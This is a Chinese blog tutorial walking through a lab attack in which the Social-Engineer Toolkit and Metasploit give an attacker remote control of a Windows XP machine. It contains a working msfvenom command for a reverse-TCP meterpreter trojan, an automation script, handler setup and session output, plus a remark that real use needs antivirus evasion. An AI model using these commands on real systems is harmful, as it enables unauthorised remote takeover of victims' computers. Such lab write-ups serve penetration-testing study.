转载请注明出处:https://blog.csdn.net/l1028386804/article/details/86669682

社会工程学工具包(Social Engineering Toolkit, SET)是一套基于Python语言的工具集合,主要面向对人进行的渗透测试。使用SET可以实现多种攻击,比如:网络钓鱼攻击、网页劫持攻击、格式文件攻击等。

这里,我们同样以一个实际案例来进行说明。

攻击机 Kali 192.168.175.128

靶机 WinXP 192.168.175.130

1.生成exe木马

msfvenom -p  windows/meterpreter/reverse_tcp lhost=192.168.175.128 lport=4444  -f exe -o  shell.exe

注意:实际过程中,需要多exe木马进行免杀防护。

2.将木马上传到靶机

实际中,我们需要将靶机进行一系列的渗透之后,拿到靶机的系统权限,将木马上传或者下载到靶机。这里只是一个示例,我就直接将exe木马拷贝到靶机中了。

3.编写社会工程学脚本se-script

这里,我们将目录切换到Kali下的/usr/share/set目录下。

在此目录下,创建脚本文件se-script,内容如下:


1
4
2
192.168.175.128
4444
yes

注意:这个脚本的第一行为空行

如下图所示:

4.安装社会工程学工具包

注意:第一次使用Kali下的社会工程学工具包的时候,需要将目录切换到/usr/share/set目录下后,执行如下命令进行安装:

./setup.py install

如果已经执行过安装命令,则此步骤可忽略。

5.运行社会工程学脚本se-script

这里,我们在Kali的/usr/share/set目录下输入如下命令:

./seautomate se-script 

具体如下:

root@binghe:/usr/share/set# ./seautomate se-script ..######..########.########.##....##.##..........##....##.......##..........##.....######..######......##..........##.##..........##....##....##.##..........##.....######..########....##...  [---]        The Social-Engineer Toolkit (SET)         [---]
[---]        Created by: David Kennedy (ReL1K)         [---]Version: 7.7.9Codename: 'Blackout'
[---]        Follow us on Twitter: @TrustedSec         [---]
[---]        Follow me on Twitter: @HackingDave        [---]
[---]       Homepage: https://www.trustedsec.com       [---]Welcome to the Social-Engineer Toolkit (SET).The one stop shop for all of your SE needs.Join us on irc.freenode.net in channel #setoolkitThe Social-Engineer Toolkit is a product of TrustedSec.Visit: https://www.trustedsec.comIt's easy to update using the PenTesters Framework! (PTF)
Visit https://github.com/trustedsec/ptf to update all your tools!Select from the menu:1) Spear-Phishing Attack Vectors2) Website Attack Vectors3) Infectious Media Generator4) Create a Payload and Listener5) Mass Mailer Attack6) Arduino-Based Attack Vector7) Wireless Access Point Attack Vector8) QRCode Generator Attack Vector9) Powershell Attack Vectors10) SMS Spoofing Attack Vector11) Third Party Modules99) Return back to the main menu.set> 41) Windows Shell Reverse_TCP               Spawn a command shell on victim and send back to attacker2) Windows Reverse_TCP Meterpreter         Spawn a meterpreter shell on victim and send back to attacker3) Windows Reverse_TCP VNC DLL             Spawn a VNC server on victim and send back to attacker4) Windows Shell Reverse_TCP X64           Windows X64 Command Shell, Reverse TCP Inline5) Windows Meterpreter Reverse_TCP X64     Connect back to the attacker (Windows x64), Meterpreter6) Windows Meterpreter Egress Buster       Spawn a meterpreter shell and find a port home via multiple ports7) Windows Meterpreter Reverse HTTPS       Tunnel communication over HTTP using SSL and use Meterpreter8) Windows Meterpreter Reverse DNS         Use a hostname instead of an IP address and use Reverse Meterpreter9) Download/Run your Own Executable        Downloads an executable and runs itset:payloads>2
set:payloads> IP address for the payload listener (LHOST):192.168.175.128
set:payloads> Enter the PORT for the reverse listener:4444
[*] Generating the payload.. please be patient.
yes
[*] Payload has been exported to the default SET directory located under: /root/.set/payload.exe
set:payloads> Do you want to start the payload and listener now? (yes/no):[*] Launching msfconsole, this could take a few to load. Be patient..._---------..' #######   ;.".---,.    ;@             @@`;   .---,..
." @@@@@'.,'@@            @@@@@',.'@@@@ ".
'-.@@@@@@@@@@@@@          @@@@@@@@@@@@@ @;`.@@@@@@@@@@@@        @@@@@@@@@@@@@@ .'"--'.@@@  -.@        @ ,'-   .'--"".@' ; @       @ `.  ;'|@@@@ @@@     @    .' @@@ @@   @@    ,`.@@@@    @@   .',@@     @   ;           _____________(   3 C    )     /|___ / Metasploit! \;@'. __*__,."    \|--- \_____________/'(.,...."/=[ metasploit v5.0.1-dev                           ]
+ -- --=[ 1851 exploits - 1046 auxiliary - 321 post       ]
+ -- --=[ 541 payloads - 44 encoders - 10 nops            ]
+ -- --=[ 2 evasion                                       ]
+ -- --=[ ** This is Metasploit 5 development branch **   ][*] Processing /root/.set/meta_config for ERB directives.
resource (/root/.set/meta_config)> use multi/handler
resource (/root/.set/meta_config)> set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
resource (/root/.set/meta_config)> set LHOST 192.168.175.128
LHOST => 192.168.175.128
resource (/root/.set/meta_config)> set LPORT 4444
LPORT => 4444
resource (/root/.set/meta_config)> set ExitOnSession false
ExitOnSession => false
resource (/root/.set/meta_config)> exploit -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.[*] Started reverse TCP handler on 192.168.175.128:4444
msf5 exploit(multi/handler) > 

输入的内容比较多,由输出的内容可知:SET工具包,将脚本文件se-script中的每一行内容都当做相应的参数设置到框架中了,同时自动启动了Metasploit框架进行监听。

此时,我们切换到靶机,点击我们的exe木马文件,如下:

切换到Kali命令行后,看到如下输出:

msf5 exploit(multi/handler) > [*] Sending stage (179779 bytes) to 192.168.175.130
[*] Meterpreter session 1 opened (192.168.175.128:4444 -> 192.168.175.130:1100) at 2019-01-27 14:41:13 +0800此时我们按下回车,并输入sessions命令msf5 exploit(multi/handler) > sessionsActive sessions
===============Id  Name  Type                     Information                    Connection--  ----  ----                     -----------                    ----------1         meterpreter x86/windows  LIUYAZHUANG\lyz @ LIUYAZHUANG  192.168.175.128:4444 -> 192.168.175.130:1100 (192.168.175.130)

可以看到靶机和攻击机之间建立了Meterpreter连接。

接着,我们输入sessions -i 1 命令进入Meterpreter命令行,具体如下:

msf5 exploit(multi/handler) > sessions -i 1
[*] Starting interaction with 1...meterpreter > ipconfigInterface  1
============
Name         : MS TCP Loopback interface
Hardware MAC : 00:00:00:00:00:00
MTU          : 1520
IPv4 Address : 127.0.0.1Interface  2
============
Name         : AMD PCNET Family PCI Ethernet Adapter - rface
Hardware MAC : 00:0c:29:5d:8e:d4
MTU          : 1500
IPv4 Address : 192.168.175.130
IPv4 Netmask : 255.255.255.0meterpreter > 

可见,我们已经利用社会工程学工具包,顺利拿下了目标机的Meterpreter权限。

接下来,我们就分析一下,SET框架是如何和se-script脚本中的参数进行关联的。

6.分析SET框架与se-script脚本的关系

在第5步中,我们只是输入了./seautomate se-script 命令,然后双击了exe木马文件,就拿到了靶机的meterpreter权限。这一切都是SET框架自动执行的结果,那么SET框架是如何自动执行的呢?下面我们就具体分析这个过程。

在分析的过程中,我们手动执行SET框架的每一个步骤,然后对比我们的脚本文件se-script中的内容。

6-1.启动SET框架

在/usr/share/set目录下输入命令:

./setoolkit

启动SET框架

6-2.选择攻击菜单

这里,我们选择1,社会工程学攻击

6-2.选择攻击方式

这里,选择4,创建一个Payload和Listener。

6-3.选择攻击载荷

这里选择2,Windows Reverse_TCP Meterpreter

6-4.设置监听IP和端口

6-5.是否立即启动

这里,询问是否立即启动攻击载荷和监听配置,这里输入yes

此时,便进入了Metasploit命令行

此时,我们双击下靶机上的exe木马,命令行输出如下信息:

[*] Started reverse TCP handler on 192.168.175.128:4444
msf5 exploit(multi/handler) > [*] Sending stage (179779 bytes) to 192.168.175.130
[*] Meterpreter session 1 opened (192.168.175.128:4444 -> 192.168.175.130:1105) at 2019-01-27 15:03:32 +0800msf5 exploit(multi/handler) > sessionsActive sessions
===============Id  Name  Type                     Information                    Connection--  ----  ----                     -----------                    ----------1         meterpreter x86/windows  LIUYAZHUANG\lyz @ LIUYAZHUANG  192.168.175.128:4444 -> 192.168.175.130:1105 (192.168.175.130)

如下图:

此时,我们输入sessions -i 1进入Meterpreter命令行。

此时,我们同样拿下了靶机的Meterpreter权限。

6-6.对比分析

在我们手动启动SET进行攻击的时候,依次输入了:1->4->2->192.168.175.128->4444-yes

再来看我们的se-script脚本:

正好一一对应,

注意:脚本的第一行为空行。

Metasploit之——社会工程学工具包相关推荐

  1. 【kali-权限提升】(4.2.1)社会工程学工具包(上):web钓鱼模块

    目录 一.社会工程学工具包(SET) 1.1.概述: 二.使用 2.1.第一步:启动SET 2.2.第二步:选择模块 2.3.第三步:payload选择 2.4.第四步:payload设置 2.5.第 ...

  2. 【kali-权限提升】(4.2.3)社会工程学工具包:二维码组合攻击

    目录 二维码攻击 作用: 1.1.第一步:启动SET 1.2.第二步:选择模块 1.3.第三步:payload选择 1.4.第四步:payload设置 1.5.第五步:返回信息 二维码攻击 作用: 二 ...

  3. MetaSploit攻击实例讲解------社会工程学set攻击(kali linux 2016.2(rolling))(详细)

    来源:https://www.cnblogs.com/zlslch/p/6888540.html 不多说,直接上干货! 首先,如果你是用的BT5,则set的配置文件是在 /pentest/exploi ...

  4. 渗透测试--3.1.社会工程学攻击

    目录 社会工程学攻击 SET介绍 一.建立克隆钓鱼网站收集目标凭证 二.set工具集之木马欺骗实战反弹链接 三.后渗透阶段 1.查看主机系统信息 2.到处用户密码的hash值 3.获得shell控制台 ...

  5. 社会工程学攻击之网站钓鱼

    前言 网络给了我们方便的同时,但也并不总是那么美好.还记得邀请苍蝇到它的客厅做客的蜘蛛吗?还记得帮助蝎子渡河的乌龟吗?这些故事都包含了猎物的天真和猎手的肮脏.互联网也是如此,其中中充斥着诱惑的陷阱.阴 ...

  6. 社会工程学工具 SET 伪造网站

    目录 SET工具包 启动 菜单 用户名和密码的窃取 第一步 Social-Engineering Attacks 第二步 Site Clone 第三步访问伪造网站 获取信息 按照<Kali Li ...

  7. SET社会工程学攻击

    目录 SET框架结构 钓鱼网站(1-2-3) 默认模板(1-2-3-1) 站点克隆(1-2-3-2) 二维码(1-8) 远控木马(1-4) 参考 总结了网上关于SET的相关文章,合并成了这篇学习笔记 ...

  8. 安全测试(三) 服务器安全 渗透测试 常规服务器安全漏洞 高危端口暴露、弱口令密码、暴力破解、服务器提权、Mysql数据库提权等 浅谈《社会工程学》实战案例

    文章目录 一.前言 二.服务器安全 高危端口 2.1 端口号(Port number) 2.2 常见端口后及其用途表 2.3 端口号 扫描工具介绍 2.4 端口号 端口说明 攻击技巧 2.5 安全警示 ...

  9. The Social-Engineer Toolkit(社会工程学套件)全网第一篇套件全模块讲解

    一.工具介绍 Social-Engineer Toolkit 是一个为社会工程设计的开源渗透测试框架. SET 有许多自定义攻击选项,可让您快速进行信任攻击. SET 是 TrustedSec, LL ...

  10. Kali社会工程学套件入侵Windows

    通过Kali系统自带的社会工程学套件制作基于Windows系统的恶意感染设备(SET.MSF.INF文件利用) MSFconsole一款不错的入侵渗透环境可以通过制作木马或者是漏洞利用去入侵计算机系统 ...

最新文章

  1. IAS的工作原理(一)作为 RADIUS 服务器的 IAS
  2. php获取图高度,PHP imagesx()、imagesy() – 获取图像宽度与高度_程序员人生
  3. 关于Oracle Stream的安装、配置和使用
  4. 从STGW流量下降探秘内核收包机制
  5. suse linux 11 HBA信息,HP BL660 GEN8 SUSE 11 查询HBA信息 驱动版本 固件版本 设备名称
  6. 谈Dreamweaver和Webstorm
  7. zookeeper 限制本机ip访问_解Bug之路-dubbo应用无法重连zookeeper
  8. EditPlus 3设置字体大小
  9. 互联网大厂的薪资和职级一览
  10. ShuffleNet模型解读
  11. java itex 打印pdf_【收藏】java使用ITEXT打印PDF
  12. matlab 三角波脉冲轨迹叠加,求解:两同频三角波叠加后的相位差(有程序,有图)...
  13. html蔚蓝网注册页面,如何在网站中添加手机短信验证码注册功能?
  14. c语言 aligned,“__attribute __((packed,aligned(4)))”的含义是什么意思?
  15. 信息安全 SEED Lab10 Packet Sniffing and Spoofing Lab
  16. 免费内网穿透软件一步设置实现外网访问
  17. 【C/C++学院】0901-设计模式的汇总演练
  18. 如何在路演中获得投资机会|兆骑科创
  19. spm12预处理步骤及知识点总结
  20. 全栈工程师眼中的HTTP

热门文章

  1. 水光半导体于2017 CES展示全方位通讯网络、多媒体及消费性电子芯片解决方案
  2. 【电子电路】电子基础基本知识和面试要点
  3. 成都市计算机会考,四川省高中信息技术会考资料及试题
  4. android 锁屏界面来电话,android锁屏界面短信解锁指向怎么修改?
  5. linux top交叉编译_Linux 交叉编译工具链
  6. 火狐上如何使用谷歌翻译插件_将Google翻译功能添加到Firefox
  7. GIS实验之制作行政区划图
  8. Windows放大镜黑屏问题以及快捷键
  9. Linux查看硬盘挂载
  10. KindEditor的简单应用